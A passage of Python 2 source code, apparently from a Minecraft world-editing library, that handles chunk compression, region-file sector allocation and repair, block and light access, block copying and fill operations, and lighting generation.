if self.compressMode == MCRegionFile.VERSION_GZIP:
self.root_tag = self.decompressTagGzip(data)
if self.compressMode == MCRegionFile.VERSION_DEFLATE:
self.root_tag = self.decompressTagDeflate(data)
def compressedSize(self):
"return the size of the compressed data for this level, in bytes."
self.compress();
if self.compressedTag is None: return 0
return len(self.compressedTag)
def sanitizeBlocks(self):
#change grass to dirt where needed so Minecraft doesn't flip out and die
grass = self.Blocks == self.materials.Grass.ID
grass |= self.Blocks == self.materials.Dirt.ID
badgrass = grass[:, :, 1:] & grass[:, :, :-1]
self.Blocks[:, :, :-1][badgrass] = self.materials.Dirt.ID
#remove any thin snow layers immediately above other thin snow layers.
#minecraft doesn't flip out, but it's almost never intended
if hasattr(self.materials, "SnowLayer"):
snowlayer = self.Blocks == self.materials.SnowLayer.ID
badsnow = snowlayer[:, :, 1:] & snowlayer[:, :, :-1]
self.Blocks[:, :, 1:][badsnow] = self.materials.Air.ID
def compress(self):
if not self.dirty:
#if we are not dirty, just throw the
#uncompressed tag structure away. rely on the OS disk cache.
self.root_tag = None
else:
if self.root_tag is not None:
self.sanitizeBlocks() #xxx
self.packChunkData()
self._compressChunk()
self.world.chunkDidCompress(self);
def decompress(self):
"""called when accessing attributes decorated with @decompress_first"""
if not self in self.world.decompressedChunkQueue:
if self.root_tag != None: return
if self.compressedTag is None:
if self.root_tag is None:
self.load();
else:
return;
try:
self._decompressChunk()
except Exception, e:
error(u"Malformed NBT data in file: {0} ({1})".format(self.filename, e))
if self.world: self.world.malformedChunk(*self.chunkPosition);
raise ChunkMalformed, (e,), sys.exc_info()[2]
try:
self.shapeChunkData()
except KeyError, e:
error(u"Incorrect chunk format in file: {0} ({1})".format(self.filename, e))
if self.world: self.world.malformedChunk(*self.chunkPosition);
raise ChunkMalformed, (e,), sys.exc_info()[2]
self.dataIsPacked = True;
self.world.chunkDidDecompress(self);
def __str__(self):
return u"InfdevChunk, coords:{0}, world: {1}, D:{2}, L:{3}".format(self.chunkPosition, self.world.displayName, self.dirty, self.needsLighting)
def create(self):
(cx, cz) = self.chunkPosition;
chunkTag = nbt.TAG_Compound()
chunkTag.name = ""
levelTag = nbt.TAG_Compound()
chunkTag[Level] = levelTag
levelTag[TerrainPopulated] = TAG_Byte(1)
levelTag[xPos] = TAG_Int(cx)
levelTag[zPos] = TAG_Int(cz)
levelTag[LastUpdate] = TAG_Long(0);
levelTag[BlockLight] = TAG_Byte_Array()
levelTag[BlockLight].value = zeros(16 * 16 * self.world.Height / 2, uint8)
levelTag[Blocks] = TAG_Byte_Array()
levelTag[Blocks].value = zeros(16 * 16 * self.world.Height, uint8)
levelTag[Data] = TAG_Byte_Array()
levelTag[Data].value = zeros(16 * 16 * self.world.Height / 2, uint8)
levelTag[SkyLight] = TAG_Byte_Array()
levelTag[SkyLight].value = zeros(16 * 16 * self.world.Height / 2, uint8)
levelTag[SkyLight].value[:] = 255
if self.world.Height <= 256:
levelTag[HeightMap] = TAG_Byte_Array()
levelTag[HeightMap].value = zeros(16 * 16, uint8)
else:
levelTag[HeightMap] = TAG_Int_Array()
levelTag[HeightMap].value = zeros(16 * 16, uint32).newbyteorder()
levelTag[Entities] = TAG_List()
levelTag[TileEntities] = TAG_List()
#levelTag["Creator"] = TAG_String("MCEdit-" + release.release);
#empty lists are seen in the wild with a list.TAG_type for a list of single bytes,
#even though these contain TAG_Compounds
self.root_tag = chunkTag
self.shapeChunkData();
self.dataIsPacked = True;
self.dirty = True;
self.save();
def save(self):
""" does not recalculate any data or light """
self.compress()
if self.dirty:
debug(u"Saving chunk: {0}".format(self))
self.world._saveChunk(self)
debug(u"Saved chunk {0}".format(self))
self.dirty = False;
def load(self):
""" If the chunk is unloaded, calls world._loadChunk to set root_tag and
compressedTag, then unpacks the chunk fully"""
if self.root_tag is None and self.compressedTag is None:
try:
self.world._loadChunk(self)
self.dataIsPacked = True;
self.shapeChunkData()
self.unpackChunkData()
except Exception, e:
error(u"Incorrect chunk format in file: {0} ({1})".format(self.filename, e))
if self.world: self.world.malformedChunk(*self.chunkPosition);
raise ChunkMalformed, (e,), sys.exc_info()[2]
self.world.chunkDidLoad(self)
self.world.chunkDidDecompress(self);
def unload(self):
""" Frees the chunk's memory. Will not save to disk. Unloads completely
if the chunk does not need to be saved."""
self.compress();
if not self.dirty:
self.compressedTag = None;
self.world.chunkDidUnload(self)
def isLoaded(self):
#we're loaded if we have our tag data in ram
#and we don't have to go back to the disk for it.
return not (self.compressedTag is None and self.root_tag is None)
def isCompressed(self):
return self.isLoaded() and self.root_tag == None
def generateHeightMap(self):
extractLightMap(self.materials, self.Blocks, self.HeightMap)
def chunkChanged(self, calcLighting=True):
""" You are required to call this function after you are done modifying
the chunk. Pass False for calcLighting if you know your changes will
not change any lights."""
if not self.isLoaded(): return;
self.dirty = True;
self.needsLighting = calcLighting or self.needsLighting;
self.generateHeightMap();
if calcLighting:
self.genFastLights()
def genFastLights(self):
self.SkyLight[:] = 0;
if self.world.dimNo in (-1, 1):
return #no light in nether or the end
blocks = self.Blocks;
la = self.world.materials.lightAbsorption
skylight = self.SkyLight;
heightmap = self.HeightMap;
for x, z in itertools.product(xrange(16), xrange(16)):
skylight[x, z, heightmap[z, x]:] = 15
lv = 15;
for y in reversed(range(heightmap[z, x])):
lv -= (la[blocks[x, z, y]] or 1)
if lv <= 0:
break;
skylight[x, z, y] = lv;
def unpackChunkData(self):
if not self.dataIsPacked: return
""" for internal use. call getChunk and compressChunk to load, compress, and unpack chunks automatically """
for key in (SkyLight, BlockLight, Data):
dataArray = self.root_tag[Level][key].value
s = dataArray.shape
assert s[2] == self.world.Height / 2;
#unpackedData = insert(dataArray[...,newaxis], 0, 0, 3)
unpackedData = zeros((s[0], s[1], s[2] * 2), dtype='uint8')
unpackedData[:, :, ::2] = dataArray
unpackedData[:, :, ::2] &= 0xf
unpackedData[:, :, 1::2] = dataArray
unpackedData[:, :, 1::2] >>= 4
self.root_tag[Level][key].value = unpackedData
self.dataIsPacked = False;
def packChunkData(self):
if self.dataIsPacked: return
if self.root_tag is None:
warn(u"packChunkData called on unloaded chunk: {0}".format(self.chunkPosition))
return;
for key in (SkyLight, BlockLight, Data):
dataArray = self.root_tag[Level][key].value
assert dataArray.shape[2] == self.world.Height;
unpackedData = self.root_tag[Level][key].value.reshape(16, 16, self.world.Height / 2, 2)
unpackedData[..., 1] <<= 4
unpackedData[..., 1] |= unpackedData[..., 0]
self.root_tag[Level][key].value = array(unpackedData[:, :, :, 1])
self.dataIsPacked = True;
def shapeChunkData(self):
"""Applies the chunk shape to all of the data arrays
in the chunk tag. used by chunk creation and loading"""
chunkTag = self.root_tag
chunkSize = 16
if not hasattr(self.world, 'HeightOverride'):
length = chunkTag[Level][Blocks].value.ravel().shape[0]
height = length / (chunkSize * chunkSize)
self.world.Height = height
self.world.HeightOverride = True
self.world._bounds = None
chunkTag[Level][Blocks].value.shape = (chunkSize, chunkSize, self.world.Height)
chunkTag[Level][HeightMap].value.shape = (chunkSize, chunkSize);
chunkTag[Level][SkyLight].value.shape = (chunkSize, chunkSize, self.world.Height / 2)
chunkTag[Level][BlockLight].value.shape = (chunkSize, chunkSize, self.world.Height / 2)
chunkTag[Level]["Data"].value.shape = (chunkSize, chunkSize, self.world.Height / 2)
if TileEntities not in chunkTag[Level]:
chunkTag[Level][TileEntities] = TAG_List();
if Entities not in chunkTag[Level]:
chunkTag[Level][Entities] = TAG_List();
def addEntity(self, entityTag):
def doubleize(name):
if name in entityTag:
m = entityTag[name]
entityTag[name] = TAG_List([TAG_Double(i.value) for i in m])
doubleize("Motion")
doubleize("Position")
self.dirty = True
return super(InfdevChunk, self).addEntity(entityTag)
def removeEntitiesInBox(self, box):
self.dirty = True;
return super(InfdevChunk, self).removeEntitiesInBox(box)
def removeTileEntitiesInBox(self, box):
self.dirty = True;
return super(InfdevChunk, self).removeTileEntitiesInBox(box)
@property
@decompress_first
def Blocks(self):
return self.root_tag[Level][Blocks].value
@property
@decompress_first
@unpack_first
def Data(self):
return self.root_tag[Level][Data].value
@property
@decompress_first
def HeightMap(self):
return self.root_tag[Level][HeightMap].value
@property
@decompress_first
@unpack_first
def SkyLight(self):
return self.root_tag[Level][SkyLight].value
@property
@decompress_first
@unpack_first
def BlockLight(self):
return self.root_tag[Level][BlockLight].value
@property
@decompress_first
def Entities(self):
return self.root_tag[Level][Entities]
@property
@decompress_first
def TileEntities(self):
return self.root_tag[Level][TileEntities]
@property
@decompress_first
def TerrainPopulated(self):
return self.root_tag[Level]["TerrainPopulated"].value;
@TerrainPopulated.setter
@decompress_first
def TerrainPopulated(self, val):
"""True or False. If False, the game will populate the chunk with
ores and vegetation on next load"""
self.root_tag[Level]["TerrainPopulated"].value = val;
class dequeset(object):
def __init__(self):
self.deque = deque();
self.set = set();
def __contains__(self, obj):
return obj in self.set;
def __len__(self):
return len(self.set);
def append(self, obj):
self.deque.append(obj);
self.set.add(obj);
def discard(self, obj):
if obj in self.set:
self.deque.remove(obj);
self.set.discard(obj);
def __getitem__(self, idx):
return self.deque[idx];
class MCRegionFile(object):
holdFileOpen = False #if False, reopens and recloses the file on each access
@property
def file(self):
openfile = lambda:file(self.path, "rb+")
if MCRegionFile.holdFileOpen:
if self._file is None:
self._file = openfile()
return notclosing(self._file)
else:
return openfile()
def close(self):
if MCRegionFile.holdFileOpen:
self._file.close()
self._file = None
def __init__(self, path, regionCoords):
self.path = path
self.regionCoords = regionCoords
self._file = None
if not os.path.exists(path):
file(path, "w").close()
with self.file as f:
filesize = os.path.getsize(path)
if filesize & 0xfff:
filesize = (filesize | 0xfff) + 1
f.truncate(filesize)
if filesize == 0:
filesize = self.SECTOR_BYTES * 2
f.truncate(filesize)
f.seek(0)
offsetsData = f.read(self.SECTOR_BYTES)
modTimesData = f.read(self.SECTOR_BYTES)
self.freeSectors = [True] * (filesize / self.SECTOR_BYTES)
self.freeSectors[0:2] = False, False
self.offsets = fromstring(offsetsData, dtype='>u4')
self.modTimes = fromstring(modTimesData, dtype='>u4')
needsRepair = False
for offset in self.offsets:
sector = offset >> 8
count = offset & 0xff
for i in xrange(sector, sector + count):
if i >= len(self.freeSectors):
#raise RegionMalformed, "Region file offset table points to sector {0} (past the end of the file)".format(i)
print "Region file offset table points to sector {0} (past the end of the file)".format(i)
needsRepair = True
break
if self.freeSectors[i] is False:
needsRepair = True
self.freeSectors[i] = False
if needsRepair:
self.repair()
info("Found region file {file} with {used}/{total} sectors used and {chunks} chunks present".format(
file=os.path.basename(path), used=self.usedSectors, total=self.sectorCount, chunks=self.chunkCount))
@property
def usedSectors(self): return len(self.freeSectors) - sum(self.freeSectors)
@property
def sectorCount(self): return len(self.freeSectors)
@property
def chunkCount(self): return sum(self.offsets > 0)
def repair(self):
lostAndFound = {}
_freeSectors = [True] * len(self.freeSectors)
_freeSectors[0] = _freeSectors[1] = False
deleted = 0
recovered = 0
info("Beginning repairs on {file} ({chunks} chunks)".format(file=os.path.basename(self.path), chunks=sum(self.offsets > 0)))
rx, rz = self.regionCoords
for index, offset in enumerate(self.offsets):
if offset:
cx = index & 0x1f
cz = index >> 5
cx += rx << 5
cz += rz << 5
sectorStart = offset >> 8
sectorCount = offset & 0xff
try:
if sectorStart + sectorCount > len(self.freeSectors):
raise RegionMalformed, "Offset {start}:{end} ({offset}) at index {index} pointed outside of the file".format(
start=sectorStart, end=sectorStart + sectorCount, index=index, offset=offset)
compressedData = self._readChunk(cx, cz)
if compressedData is None:
raise RegionMalformed, "Failed to read chunk data for {0}".format((cx, cz))
format, data = self.decompressSectors(compressedData)
chunkTag = nbt.load(buf=data)
lev = chunkTag["Level"]
xPos = lev["xPos"].value
zPos = lev["zPos"].value
overlaps = False
for i in xrange(sectorStart, sectorStart + sectorCount):
if _freeSectors[i] is False:
overlaps = True
_freeSectors[i] = False
if xPos != cx or zPos != cz or overlaps:
lostAndFound[xPos, zPos] = (format, compressedData)
if (xPos, zPos) != (cx, cz):
raise RegionMalformed, "Chunk {found} was found in the slot reserved for {expected}".format(found=(xPos, zPos), expected=(cx, cz))
else:
raise RegionMalformed, "Chunk {found} (in slot {expected}) has overlapping sectors with another chunk!".format(found=(xPos, zPos), expected=(cx, cz))
except Exception, e:
info("Unexpected chunk data at sector {sector} ({exc})".format(sector=sectorStart, exc=e))
self.setOffset(cx, cz, 0)
deleted += 1
for cPos, (format, foundData) in lostAndFound.iteritems():
cx, cz = cPos
if self.getOffset(cx, cz) == 0:
info("Found chunk {found} and its slot is empty, recovering it".format(found=cPos))
self._saveChunk(cx, cz, foundData[5:], format)
recovered += 1
info("Repair complete. Removed {0} chunks, recovered {1} chunks, net {2}".format(deleted, recovered, recovered - deleted))
def extractAllChunks(self, folder):
if not os.path.exists(folder):
os.mkdir(folder)
for cx, cz in itertools.product(range(32), range(32)):
sectors = self._readChunk(cx, cz)
if sectors is not None:
format, compressedData = self.unpackSectors(sectors)
data = self._decompressSectors(format, compressedData)
chunkTag = nbt.load(buf=data)
lev = chunkTag["Level"]
xPos = lev["xPos"].value
zPos = lev["zPos"].value
gzdata = InfdevChunk.compressTagGzip(chunkTag)
#print chunkTag.pretty_string()
with file(os.path.join(folder, "c.{0}.{1}.dat".format(base36(xPos), base36(zPos))), "wb") as f:
f.write(gzdata)
def _readChunk(self, cx, cz):
cx &= 0x1f
cz &= 0x1f
offset = self.getOffset(cx, cz)
if offset == 0: return None
sectorStart = offset >> 8
numSectors = offset & 0xff
if numSectors == 0: return None
if sectorStart + numSectors > len(self.freeSectors):
return None
with self.file as f:
f.seek(sectorStart * self.SECTOR_BYTES)
data = f.read(numSectors * self.SECTOR_BYTES)
assert(len(data) > 0)
#debug("REGION LOAD {0},{1} sector {2}".format(cx, cz, sectorStart))
return data
def loadChunk(self, chunk):
cx, cz = chunk.chunkPosition
data = self._readChunk(cx, cz)
if data is None: raise ChunkNotPresent, (cx, cz, self)
chunk.compressedTag = data[5:]
format, data = self.decompressSectors(data)
chunk.root_tag = nbt.load(buf=data)
chunk.compressMode = format
def unpackSectors(self, data):
length = struct.unpack_from(">I", data)[0]
format = struct.unpack_from("B", data, 4)[0]
data = data[5:length + 5]
return (format, data)
def _decompressSectors(self, format, data):
if format == self.VERSION_GZIP:
return gunzip(data)
if format == self.VERSION_DEFLATE:
return inflate(data)
raise IOError, "Unknown compress format: {0}".format(format)
def decompressSectors(self, data):
format, data = self.unpackSectors(data)
return format, self._decompressSectors(format, data)
def saveChunk(self, chunk):
cx, cz = chunk.chunkPosition
data = chunk.compressedTag
format = chunk.compressMode
self._saveChunk(cx, cz, data, format)
def _saveChunk(self, cx, cz, data, format):
cx &= 0x1f
cz &= 0x1f
offset = self.getOffset(cx, cz)
sectorNumber = offset >> 8
sectorsAllocated = offset & 0xff
sectorsNeeded = (len(data) + self.CHUNK_HEADER_SIZE) / self.SECTOR_BYTES + 1;
if sectorsNeeded >= 256: return
if (sectorNumber != 0 and sectorsAllocated >= sectorsNeeded):
debug("REGION SAVE {0},{1} rewriting {2}b".format(cx, cz, len(data)))
self.writeSector(sectorNumber, data, format)
else:
# we need to allocate new sectors
# mark the sectors previously used for this chunk as free
for i in xrange(sectorNumber, sectorNumber + sectorsAllocated):
self.freeSectors[i] = True
runLength = 0
try:
runStart = self.freeSectors.index(True)
for i in range(runStart, len(self.freeSectors)):
if runLength:
if self.freeSectors[i]:
runLength += 1
else:
runLength = 0
elif self.freeSectors[i]:
runStart = i
runLength = 1
if runLength >= sectorsNeeded:
break
except ValueError:
pass
# we found a free space large enough
if runLength >= sectorsNeeded:
debug("REGION SAVE {0},{1}, reusing {2}b".format(cx, cz, len(data)))
sectorNumber = runStart
self.setOffset(cx, cz, sectorNumber << 8 | sectorsNeeded)
self.writeSector(sectorNumber, data, format)
self.freeSectors[sectorNumber:sectorNumber + sectorsNeeded] = [False] * sectorsNeeded
else:
# no free space large enough found -- we need to grow the
# file
debug("REGION SAVE {0},{1}, growing by {2}b".format(cx, cz, len(data)))
with self.file as f:
f.seek(0, 2)
filesize = f.tell()
sectorNumber = len(self.freeSectors)
assert sectorNumber * self.SECTOR_BYTES == filesize
filesize += sectorsNeeded * self.SECTOR_BYTES
f.truncate(filesize)
self.freeSectors += [False] * sectorsNeeded
self.setOffset(cx, cz, sectorNumber << 8 | sectorsNeeded)
self.writeSector(sectorNumber, data, format)
def writeSector(self, sectorNumber, data, format):
with self.file as f:
debug("REGION: Writing sector {0}".format(sectorNumber))
f.seek(sectorNumber * self.SECTOR_BYTES)
f.write(struct.pack(">I", len(data) + 1));# // chunk length
f.write(struct.pack("B", format));# // chunk version number
f.write(data);# // chunk data
#f.flush()
def containsChunk(self, cx,cz):
return self.getOffset(cx,cz) != 0
def getOffset(self, cx, cz):
cx &= 0x1f;
cz &= 0x1f
return self.offsets[cx + cz * 32]
def setOffset(self, cx, cz, offset):
cx &= 0x1f;
cz &= 0x1f
self.offsets[cx + cz * 32] = offset
with self.file as f:
f.seek(0)
f.write(self.offsets.tostring())
SECTOR_BYTES = 4096
SECTOR_INTS = SECTOR_BYTES / 4
CHUNK_HEADER_SIZE = 5;
VERSION_GZIP = 1
VERSION_DEFLATE = 2
compressMode = VERSION_DEFLATE
base36alphabet = "0123456789abcdefghijklmnopqrstuvwxyz"
def decbase36(s):
return int(s, 36)
def base36(n):
global base36alphabet
n = int(n);
if 0 == n: return '0'
neg = "";
if n < 0:
neg = "-"
n = -n;
work = []
while(n):
n, digit = divmod(n, 36)
work.append(base36alphabet[digit])
return neg + ''.join(reversed(work))
def deflate(data):
#zobj = zlib.compressobj(6,zlib.DEFLATED,-zlib.MAX_WBITS,zlib.DEF_MEM_LEVEL,0)
#zdata = zobj.compress(data)
#zdata += zobj.flush()
#return zdata
return zlib.compress(data)
def inflate(data):
return zlib.decompress(data)
class ChunkedLevelMixin(object):
def blockLightAt(self, x, y, z):
if y < 0 or y >= self.Height: return 0
zc = z >> 4
xc = x >> 4
xInChunk = x & 0xf;
zInChunk = z & 0xf;
ch = self.getChunk(xc, zc)
return ch.BlockLight[xInChunk, zInChunk, y]
def setBlockLightAt(self, x, y, z, newLight):
if y < 0 or y >= self.Height: return 0
zc = z >> 4
xc = x >> 4
xInChunk = x & 0xf;
zInChunk = z & 0xf;
ch = self.getChunk(xc, zc)
ch.BlockLight[xInChunk, zInChunk, y] = newLight
ch.chunkChanged(False)
def blockDataAt(self, x, y, z):
if y < 0 or y >= self.Height: return 0
zc = z >> 4
xc = x >> 4
xInChunk = x & 0xf;
zInChunk = z & 0xf;
try:
ch = self.getChunk(xc, zc)
except ChunkNotPresent:
return 0
return ch.Data[xInChunk, zInChunk, y]
def setBlockDataAt(self, x, y, z, newdata):
if y < 0 or y >= self.Height: return 0
zc = z >> 4
xc = x >> 4
xInChunk = x & 0xf;
zInChunk = z & 0xf;
try:
ch = self.getChunk(xc, zc)
except ChunkNotPresent:
return 0
ch.Data[xInChunk, zInChunk, y] = newdata
ch.dirty = True
ch.needsLighting = True
def blockAt(self, x, y, z):
"""returns 0 for blocks outside the loadable chunks. automatically loads chunks."""
if y < 0 or y >= self.Height: return 0
zc = z >> 4
xc = x >> 4
xInChunk = x & 0xf;
zInChunk = z & 0xf;
try:
ch = self.getChunk(xc, zc)
except ChunkNotPresent:
return 0
return ch.Blocks[xInChunk, zInChunk, y]
def setBlockAt(self, x, y, z, blockID):
"""returns 0 for blocks outside the loadable chunks. automatically loads chunks."""
if y < 0 or y >= self.Height: return 0
zc = z >> 4
xc = x >> 4
xInChunk = x & 0xf;
zInChunk = z & 0xf;
try:
ch = self.getChunk(xc, zc)
except ChunkNotPresent:
return 0
ch.Blocks[xInChunk, zInChunk, y] = blockID
ch.dirty = True
ch.needsLighting = True
def skylightAt(self, x, y, z):
if y < 0 or y >= self.Height: return 0
zc = z >> 4
xc = x >> 4
xInChunk = x & 0xf;
zInChunk = z & 0xf
ch = self.getChunk(xc, zc)
return ch.SkyLight[xInChunk, zInChunk, y]
def setSkylightAt(self, x, y, z, lightValue):
if y < 0 or y >= self.Height: return 0
zc = z >> 4
xc = x >> 4
xInChunk = x & 0xf;
zInChunk = z & 0xf;
ch = self.getChunk(xc, zc)
skyLight = ch.SkyLight
oldValue = skyLight[xInChunk, zInChunk, y]
ch.chunkChanged(False)
if oldValue < lightValue:
skyLight[xInChunk, zInChunk, y] = lightValue
return oldValue < lightValue
def sourceMaskFunc(self, blocksToCopy):
if blocksToCopy is not None:
typemask = zeros((256) , dtype='bool')
typemask[blocksToCopy] = 1;
def sourceMask(sourceBlocks):
return typemask[sourceBlocks]
else:
def sourceMask(_sourceBlocks):
return slice(None, None)
return sourceMask
def copyBlocksFromFiniteIter(self, sourceLevel, sourceBox, destinationPoint, blocksToCopy, create = False):
#assumes destination point and bounds have already been checked.
(sx, sy, sz) = sourceBox.origin
start = datetime.now();
sourceMask = self.sourceMaskFunc(blocksToCopy)
destBox = BoundingBox(destinationPoint, sourceBox.size)
i = 0;
chunkCount = float(destBox.chunkCount)
for (cPos, slices, point) in self._getSlices(destBox):
if not self.containsChunk(*cPos):
if create:
self.createChunk(*cPos)
else:
continue
chunk = self.getChunk(*cPos)
i += 1;
yield (i, chunkCount)
if i % 100 == 0:
info("Chunk {0}...".format(i))
blocks = chunk.Blocks[slices];
localSourceCorner2 = (
sx + point[0] + blocks.shape[0],
sy + blocks.shape[2],
sz + point[2] + blocks.shape[1],
)
sourceBlocks = sourceLevel.Blocks[sx + point[0]:localSourceCorner2[0],
sz + point[2]:localSourceCorner2[2],
sy:localSourceCorner2[1]]
#sourceBlocks = filterTable[sourceBlocks]
mask = sourceMask(sourceBlocks)
#for small level slices, reduce the destination area
x, z, y = sourceBlocks.shape
blocks = blocks[0:x, 0:z, 0:y]
sourceData = None
if hasattr(sourceLevel, 'Data'):
#indev or schematic
sourceData = sourceLevel.Data[sx + point[0]:localSourceCorner2[0],
sz + point[2]:localSourceCorner2[2],
sy:localSourceCorner2[1]]
data = chunk.Data[slices][0:x, 0:z, 0:y]
convertedSourceBlocks, convertedSourceData = self.convertBlocksFromLevel(sourceLevel, sourceBlocks, sourceData)
blocks[mask] = convertedSourceBlocks[mask]
if convertedSourceData is not None:
data[mask] = (convertedSourceData[:, :, :])[mask]
data[mask] &= 0xf;
chunk.chunkChanged();
d = datetime.now() - start;
if i:
info("Finished {2} chunks in {0} ({1} per chunk)".format(d, d / i, i))
#chunk.compress(); #xxx find out why this trashes changes to tile entities
def copyBlocksFromInfiniteIter(self, sourceLevel, sourceBox, destinationPoint, blocksToCopy, create = False):
""" copy blocks between two infinite levels by looping through the
destination's chunks. make a sub-box of the source level for each chunk
and copy block and entities in the sub box to the dest chunk."""
#assumes destination point and bounds have already been checked.
destBox = BoundingBox(destinationPoint, sourceBox.size)
chunkCount = destBox.chunkCount
i = 0
sourceMask = self.sourceMaskFunc(blocksToCopy)
def subbox(slices, point):
size = [s.stop - s.start for s in slices]
size[1], size[2] = size[2], size[1]
return BoundingBox([p + a for p, a in zip(point, sourceBox.origin)], size)
def shouldCreateFunc(slices, point):
box = subbox(slices, point)
b = any(list(sourceLevel.containsChunk(*c) for c in box.chunkPositions)) #any() won't take a generator-expression :(
#if b == False:
# print 'Skipped ', list(box.chunkPositions)
return b
for cPos, slices, point in self._getSlices(destBox):
if not self.containsChunk(*cPos):
if shouldCreateFunc(slices, point):
self.createChunk(*cPos)
else:
continue
chunk = self.getChunk(*cPos)
i += 1
yield (i, chunkCount)
if i % 100 == 0:
info("Chunk {0}...".format(i))
dstblocks = chunk.Blocks[slices]
dstdata = chunk.Data[slices]
sourceSubBox = subbox(slices, point)
for srcchunk, srcslices, srcpoint in sourceLevel.getChunkSlices(sourceSubBox):
srcpoint = srcpoint[0], srcpoint[2], srcpoint[1]
sourceBlocks = srcchunk.Blocks[srcslices]
sourceData = srcchunk.Data[srcslices]
mask = sourceMask(sourceBlocks)
convertedSourceBlocks, convertedSourceData = self.convertBlocksFromLevel(sourceLevel, sourceBlocks, sourceData)
dstslices = [slice(p, p + (s.stop - s.start)) for p, s in zip(srcpoint, srcslices)]
dstblocks[dstslices][mask] = convertedSourceBlocks[mask]
if convertedSourceData is not None:
dstdata[dstslices][mask] = convertedSourceData[mask]
chunk.chunkChanged()
def copyBlocksFrom(self, sourceLevel, sourceBox, destinationPoint, blocksToCopy=None, entities=True, create=False):
return exhaust(self.copyBlocksFromIter(sourceLevel, sourceBox, destinationPoint, blocksToCopy, entities, create))
def copyBlocksFromIter(self, sourceLevel, sourceBox, destinationPoint, blocksToCopy=None, entities=True, create=False):
(x, y, z) = destinationPoint;
(lx, ly, lz) = sourceBox.size
#sourcePoint, sourcePoint1 = sourceBox
sourceBox, destinationPoint = self.adjustCopyParameters(sourceLevel, sourceBox, destinationPoint)
#needs work xxx
info(u"Copying {0} blocks from {1} to {2}" .format (ly * lz * lx, sourceBox, destinationPoint))
startTime = datetime.now()
if not sourceLevel.isInfinite:
for i in self.copyBlocksFromFiniteIter(sourceLevel, sourceBox, destinationPoint, blocksToCopy, create):
yield i
else:
for i in self.copyBlocksFromInfiniteIter(sourceLevel, sourceBox, destinationPoint, blocksToCopy, create):
yield i
for i in self.copyEntitiesFromIter(sourceLevel, sourceBox, destinationPoint, entities):
yield i
info("Duration: {0}".format(datetime.now() - startTime))
#self.saveInPlace()
def fillBlocks(self, box, blockInfo, blocksToReplace=[]):
return exhaust(self.fillBlocksIter(box, blockInfo, blocksToReplace))
def fillBlocksIter(self, box, blockInfo, blocksToReplace=[]):
if box is None:
chunkIterator = self.getAllChunkSlices()
box = self.bounds
else:
chunkIterator = self.getChunkSlices(box)
#shouldRetainData = (not blockInfo.hasVariants and not any([b.hasVariants for b in blocksToReplace]))
#if shouldRetainData:
# info( "Preserving data bytes" )
shouldRetainData = False #xxx old behavior overwrote blockdata with 0 when e.g. replacing water with lava
info("Replacing {0} with {1}".format(blocksToReplace, blockInfo))
changesLighting = True
if len(blocksToReplace):
blocktable = self.blockReplaceTable(blocksToReplace)
shouldRetainData = all([blockrotation.SameRotationType(blockInfo, b) for b in blocksToReplace])
newAbsorption = self.materials.lightAbsorption[blockInfo.ID]
oldAbsorptions = [self.materials.lightAbsorption[b.ID] for b in blocksToReplace]
changesLighting = False
for a in oldAbsorptions:
if a != newAbsorption: changesLighting = True;
newEmission = self.materials.lightEmission[blockInfo.ID]
oldEmissions = [self.materials.lightEmission[b.ID] for b in blocksToReplace]
for a in oldEmissions:
if a != newEmission: changesLighting = True;
i = 0;
skipped = 0
replaced = 0;
for (chunk, slices, point) in chunkIterator:
i += 1;
if i % 100 == 0:
info(u"Chunk {0}...".format(i))
yield i, box.chunkCount
blocks = chunk.Blocks[slices]
data = chunk.Data[slices]
mask = slice(None)
needsLighting = changesLighting;
if len(blocksToReplace):
mask = blocktable[blocks, data]
blockCount = mask.sum()
replaced += blockCount;
#don't waste time relighting and copying if the mask is empty
if blockCount:
blocks[:][mask] = blockInfo.ID
if not shouldRetainData:
data[mask] = blockInfo.blockData
else:
skipped += 1;
needsLighting = False;
def include(tileEntity):
p = TileEntity.pos(tileEntity)
x, y, z = map(lambda a, b, c:(a - b) - c, p, point, box.origin)
return not ((p in box) and mask[x, z, y])
chunk.TileEntities.value[:] = filter(include, chunk.TileEntities)
else:
blocks[:] = blockInfo.ID
if not shouldRetainData:
data[:] = blockInfo.blockData
chunk.removeTileEntitiesInBox(box)
chunk.chunkChanged(needsLighting);
if len(blocksToReplace):
info(u"Replace: Skipped {0} chunks, replaced {1} blocks".format(skipped, replaced))
def generateLights(self, dirtyChunks=None):
return exhaust(self.generateLightsIter(dirtyChunks))
def _getChunkUnloaded(self, cx, cz):
return self.getChunk(cx,cz)
def generateLightsIter(self, dirtyChunks=None):
""" dirtyChunks may be an iterable yielding (xPos,zPos) tuples
if none, generate lights for all chunks that need lighting
"""
startTime = datetime.now();
if dirtyChunks is None:
dirtyChunks = (ch for ch in self._loadedChunks.itervalues() if ch.needsLighting)
else:
dirtyChunks = (self._getChunkUnloaded(*c) for c in dirtyChunks if self.containsChunk(*c))
dirtyChunks = sorted(dirtyChunks, key=lambda x:x.chunkPosition)
#at 150k per loaded chunk,
maxLightingChunks = 4000
info(u"Asked to light {0} chunks".format(len(dirtyChunks)))
chunkLists = [dirtyChunks];
def reverseChunkPosition(x):
cx, cz = x.chunkPosition;
return cz, cx
def splitChunkLists(chunkLists):
newChunkLists = []
for l in chunkLists:
#list is already sorted on x position, so this splits into left and right
smallX = l[:len(l) / 2]
bigX = l[len(l) / 2:]
#sort halves on z position
smallX = sorted(smallX, key=reverseChunkPosition)
bigX = sorted(bigX, key=reverseChunkPosition)
#add quarters to list
newChunkLists.append(smallX[:len(smallX) / 2])
newChunkLists.append(smallX[len(smallX) / 2:])
newChunkLists.append(bigX[:len(bigX) / 2])
newChunkLists.append(bigX[len(bigX) / 2:])
return newChunkLists
while len(chunkLists[0]) > maxLightingChunks:
chunkLists = splitChunkLists(chunkLists);
if len(chunkLists) > 1:
info(u"Using {0} batches to conserve memory.".format(len(chunkLists)))
#batchSize = min(len(a) for a in chunkLists)
estimatedTotals = [len(a) * 32 for a in chunkLists]
workDone = 0
for i, dc in enumerate(chunkLists):
info(u"Batch {0}/{1}".format(i, len(chunkLists)))
dc = sorted(dc, key=lambda x:x.chunkPosition)
workTotal = sum(estimatedTotals)
t = 0
for c,t,p in self._generateLightsIter(dc):
yield c+workDone,t + workTotal - estimatedTotals[i], p
estimatedTotals[i] = t
workDone += t
for ch in dc:
ch.compress();
timeDelta = datetime.now() - startTime;
if len(dirtyChunks):
info(u"Completed in {0}, {1} per chunk".format(timeDelta, dirtyChunks and timeDelta / len(dirtyChunks) or 0))
return;
def _generateLightsIter(self, dirtyChunks):
conserveMemory = False
